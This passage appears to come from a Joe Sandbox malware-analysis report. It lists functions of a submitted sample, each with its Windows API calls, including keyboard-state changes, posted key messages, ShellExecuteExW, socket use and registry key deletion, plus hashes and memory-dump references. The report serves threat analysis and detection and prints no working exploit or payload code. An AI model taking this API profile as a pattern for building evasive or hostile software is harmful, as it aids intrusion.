Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: dd0d917a40cc73274dbe0d722b31bb1f356511f5f7cbb4e45b44ae9970cfe162
Instruction ID: 9bddac04fb90cec70a10dd1dcceef7ee0c1a645cc41d4a0b43c24b092268e08e
Opcode Fuzzy Hash: dd0d917a40cc73274dbe0d722b31bb1f356511f5f7cbb4e45b44ae9970cfe162
Instruction Fuzzy Hash: CB0186F2900208BFE751ABA0DD89EF7776DEB08300F0006B5B745E2151EA745EC54B74

Function 0068D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623

GetSystemMetrics.USER32(0000000F), ref: 0068D47C
GetSystemMetrics.USER32(0000000F), ref: 0068D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0068D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0068D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0068D716
ShowWindow.USER32(00000003,00000000), ref: 0068D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0068D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0068D77D

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: ef3af4982a59e480caa205b596eae2b9dacc95ad0ca2609a4cd0b72e84a6eb14
Instruction ID: dffd095f7499e891e7fced219493a815553fa1d6d6c30d6064a48b8ac856125f
Opcode Fuzzy Hash: ef3af4982a59e480caa205b596eae2b9dacc95ad0ca2609a4cd0b72e84a6eb14
Instruction Fuzzy Hash: E7B17C71500229EFDF14DF68C985BED7BB2FF04711F088269ED589B295E734A990CB60

Function 00602A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0063C1C7,00000004,00000000,00000000,00000000), ref: 00602ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0063C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00602B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0063C1C7,00000004,00000000,00000000,00000000), ref: 0063C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0063C1C7,00000004,00000000,00000000,00000000), ref: 0063C286

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2066fad11d594fe86a5e954714886474103d9871fd61f97d9bf5299814d81718
Instruction ID: 12f0e73f62da2339cc127547c7b6da6065040f1e1c7c023d90cf859fd004fa2e
Opcode Fuzzy Hash: 2066fad11d594fe86a5e954714886474103d9871fd61f97d9bf5299814d81718
Instruction Fuzzy Hash: AC412C30744681AEDB3D8B289CACBBB7B93AF45314F14891DF047926E1DF75A882D760

Function 006670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006670DD

Part of subcall function 00620DB6: std::exception::exception.LIBCMT ref: 00620DEC
Part of subcall function 00620DB6: __CxxThrowException@8.LIBCMT ref: 00620E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00667114
EnterCriticalSection.KERNEL32(?), ref: 00667130
_memmove.LIBCMT ref: 0066717E
_memmove.LIBCMT ref: 0066719B
LeaveCriticalSection.KERNEL32(?), ref: 006671AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006671BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 006671DE

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 2d04d7b6e39aed7a61c0bb7997fde4d21816b905b104690af6b99cffc03023d6
Instruction ID: d9a21dc202d43b82c959c6344ab7f8f14e27a57c0830fa45a3c154efb0bae1b8
Opcode Fuzzy Hash: 2d04d7b6e39aed7a61c0bb7997fde4d21816b905b104690af6b99cffc03023d6
Instruction Fuzzy Hash: 32318D71900215EBDF40DFA4EC85AAEB7BAEF45710F1541BAF904AB246DB309E50CBA4

Function 006861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 006861EB
GetDC.USER32(00000000), ref: 006861F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006861FE
ReleaseDC.USER32(00000000,00000000), ref: 0068620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00686246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00686257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0068902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00686291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006862B1

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: f48a22cb2e1787cded0aa88f91621b4d1730ae5bbe57c4e1b9d1ab4fdcaf12fd
Instruction ID: e5bca9334b1e270327d79e907e383a4780f184a6b159aff14fe6b282154037ab
Opcode Fuzzy Hash: f48a22cb2e1787cded0aa88f91621b4d1730ae5bbe57c4e1b9d1ab4fdcaf12fd
Instruction Fuzzy Hash: D7319F72100210BFEB109F10CC8AFEA3BAAEF49765F040265FE089A291D6B59C41CB74

Function 0066EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

Part of subcall function 0061FC86: _wcscpy.LIBCMT ref: 0061FCA9

_wcstok.LIBCMT ref: 0066EC94
_wcscpy.LIBCMT ref: 0066ED23
_memset.LIBCMT ref: 0066ED56

Strings

X, xrefs: 0066ED93

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: b9c9331d9302d1547160f1e77be0d2200ebce81f3d834b9791ed316fc496bdf1
Instruction ID: c202571e83af3a85880ed27c941a170d2dcdaad6d7528aface5226a5758c28f8
Opcode Fuzzy Hash: b9c9331d9302d1547160f1e77be0d2200ebce81f3d834b9791ed316fc496bdf1
Instruction Fuzzy Hash: 78C180755087419FC794EF24C841A9BB7E6FF85310F00492DF89A9B2A2DB31EC45CB56

Function 00676B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00676C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00676C21
WSAGetLastError.WSOCK32(00000000), ref: 00676C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00676CEA
inet_ntoa.WSOCK32(?), ref: 00676CA7

Part of subcall function 0065A7E9: _strlen.LIBCMT ref: 0065A7F3
Part of subcall function 0065A7E9: _memmove.LIBCMT ref: 0065A815

_strlen.LIBCMT ref: 00676D44
_memmove.LIBCMT ref: 00676DAD

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 3fff1f4204d8e0bc6fbdd025186db349a55d576299841d3d73b73b6bd04a2593
Instruction ID: 01ebfaf30d5a58d61acca20c33ed05baf247bd78e8392b8d0b6031a67591c368
Opcode Fuzzy Hash: 3fff1f4204d8e0bc6fbdd025186db349a55d576299841d3d73b73b6bd04a2593
Instruction Fuzzy Hash: 6381E171204700AFD754EB24CC82EABB7ABAF84714F108A1DF95A9B2D2DB70ED05CB55

Function 00601424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3791453605859e3f66b437746ecabfee9aabaa1a6238c1605dbb7151b78336d0
Instruction ID: 9e1ff829fce2d0374b062f0c3db40f3cdd3cb54b274de8c8d5a47e4dbc53ac97
Opcode Fuzzy Hash: 3791453605859e3f66b437746ecabfee9aabaa1a6238c1605dbb7151b78336d0
Instruction Fuzzy Hash: 95715F70940109EFCB09CF94CC89AFFBBB6FF86314F148159F915AA291C7349A51CBA4

Function 0068B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01425550), ref: 0068B3EB
IsWindowEnabled.USER32(01425550), ref: 0068B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0068B4DB
SendMessageW.USER32(01425550,000000B0,?,?), ref: 0068B512
IsDlgButtonChecked.USER32(?,?), ref: 0068B54F
GetWindowLongW.USER32(01425550,000000EC), ref: 0068B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0068B589

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 8564b061c43c6ea3794ee4b1d7db26109adb531f7778cc830c49ca4c80390249
Instruction ID: 088e4234b3b9e6f03f7ef7ce3d93c956386b094d29e97ff92f51a139fb8568ee
Opcode Fuzzy Hash: 8564b061c43c6ea3794ee4b1d7db26109adb531f7778cc830c49ca4c80390249
Instruction Fuzzy Hash: AE718C34601604EFDB20AF54C895FFA7BFBEF09300F146259E946973A6C731A981CB50

Function 0067F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0067F448
_memset.LIBCMT ref: 0067F511
ShellExecuteExW.SHELL32(?), ref: 0067F556

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

Part of subcall function 0061FC86: _wcscpy.LIBCMT ref: 0061FCA9

GetProcessId.KERNEL32(00000000), ref: 0067F5CD
CloseHandle.KERNEL32(00000000), ref: 0067F5FC

Strings

@, xrefs: 0067F525

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: c7ab7a959d8d16af9c16acc9ab47295900d92c9e7e816141c62cf0f97955b35f
Instruction ID: 9e4c2e4f93e2fc73599d2926ed2d0a47b5e2bc0e96a9c7853be3ca48824150d8
Opcode Fuzzy Hash: c7ab7a959d8d16af9c16acc9ab47295900d92c9e7e816141c62cf0f97955b35f
Instruction Fuzzy Hash: 7A618DB5A006199FCB54DF64C8819AEBBF6FF48310F14856DE859AB392CB30AD41CF94

Function 00660F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00660F8C
GetKeyboardState.USER32(?), ref: 00660FA1
SetKeyboardState.USER32(?), ref: 00661002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00661030
PostMessageW.USER32(?,00000101,00000011,?), ref: 0066104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00661095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 006610B8

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b78565f541ce2857b649b437e14cff486acbda94abce64388d132a2eacaa0f31
Instruction ID: 2c413e9bcd1cd71f8a2723f704090f19f8b25517858924b8509fc2d1e95d5c8e
Opcode Fuzzy Hash: b78565f541ce2857b649b437e14cff486acbda94abce64388d132a2eacaa0f31
Instruction Fuzzy Hash: EE51FFA06046D53DFB3243348C15BFABEAB5B07304F0C8589E1D48A9D2D6A9ECC9D751

Function 00660D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00660DA5
GetKeyboardState.USER32(?), ref: 00660DBA
SetKeyboardState.USER32(?), ref: 00660E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00660E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00660E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00660EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00660EC9

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 28ac49d4e0b85a2aaf01ccad39479f09615ea7a0eda5eddc989c3e6154ee0e33
Instruction ID: ff34772b8126d5b3c0734160b9e8e6132eb7e8ddeb1438f5422a05ecb8a12586
Opcode Fuzzy Hash: 28ac49d4e0b85a2aaf01ccad39479f09615ea7a0eda5eddc989c3e6154ee0e33
Instruction Fuzzy Hash: 3251F4A05447E53DFB3683748C55BBBBFAA5F06300F0889ADE1D44A9C2D3A6EC98D750

Function 006655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0066560A
_wcsncpy.LIBCMT ref: 0066563F
_wcsncpy.LIBCMT ref: 00665671
_wcsncpy.LIBCMT ref: 006656A4
_wcsncpy.LIBCMT ref: 006656E6
_wcsncpy.LIBCMT ref: 00665720
_wcsncpy.LIBCMT ref: 0066574F

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 8edb5fa548f053832ebe8a62fe019c560ea2e7f19308fef26a5cb73a490f802b
Instruction ID: 88956ebadb5936ca9c77a6ad898e1df054a4a2d7d4da0b137d0080823f3df47e
Opcode Fuzzy Hash: 8edb5fa548f053832ebe8a62fe019c560ea2e7f19308fef26a5cb73a490f802b
Instruction Fuzzy Hash: 9E41D565C10A2476CB51EBB4DC479CFB7BA9F04310F50895AF509E3221FB34A385CBAA

Function 0065D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0065D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0065D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0065D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0065D69D

Strings

,,i, xrefs: 0065D578
DllGetClassObject, xrefs: 0065D610

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,i$DllGetClassObject
API String ID: 753597075-1121700710
Opcode ID: cdebda7f49abe46150abc67452b6a8fe4eab329be5b06c9ad503b72c38c2c0e8
Instruction ID: 26af33cd42e2d676f65ba43e5eda1092268f022bf402c8cb184788792bada2ca
Opcode Fuzzy Hash: cdebda7f49abe46150abc67452b6a8fe4eab329be5b06c9ad503b72c38c2c0e8
Instruction Fuzzy Hash: 8B418FB1600204EFDF25DF54C884A9A7BAAEF44311F1581ADEC09DF245D7B1D949CBA0

Function 00663671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0066466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00663697,?), ref: 0066468B

Part of subcall function 0066466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00663697,?), ref: 006646A4

lstrcmpiW.KERNEL32(?,?), ref: 006636B7
_wcscmp.LIBCMT ref: 006636D3
MoveFileW.KERNEL32(?,?), ref: 006636EB
_wcscat.LIBCMT ref: 00663733
SHFileOperationW.SHELL32(?), ref: 0066379F

Strings

\*.*, xrefs: 0066372D

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 121569fc25a84986ea2c26d33a6f28dadb5dea4dedf60ba15c26b241721e2844
Instruction ID: 182df2e471ce482dde6a54fff4d5bbd76f0f5c239ce9c0024fe638bd3f4d48ec
Opcode Fuzzy Hash: 121569fc25a84986ea2c26d33a6f28dadb5dea4dedf60ba15c26b241721e2844
Instruction Fuzzy Hash: 3A418371508354AEC751EF64D4419DFB7EAEF89340F00092EF49AC3251EB34D689CB56

Function 00687291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006872AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00687351
IsMenu.USER32(?), ref: 00687369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006873B1
DrawMenuBar.USER32 ref: 006873C4

Strings

0, xrefs: 0068729E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 651a97baa9fbf405077ad3e1b60ff2f8091e7e9b2b9843e7f8d59cd38bdfc55c
Instruction ID: be8b696101134405951e09292d2135bdb2dd3eb1123d1a154f94da3c0f27a1b4
Opcode Fuzzy Hash: 651a97baa9fbf405077ad3e1b60ff2f8091e7e9b2b9843e7f8d59cd38bdfc55c
Instruction Fuzzy Hash: 95412575A04209AFDB20EF50D884EEABBBAFB04311F249629FD15A7360D730ED50EB51

Function 00680FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00680FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00680FFE
FreeLibrary.KERNEL32(00000000), ref: 006810B5

Part of subcall function 00680FA5: RegCloseKey.ADVAPI32(?), ref: 0068101B
Part of subcall function 00680FA5: FreeLibrary.KERNEL32(?), ref: 0068106D
Part of subcall function 00680FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00681090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00681058

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
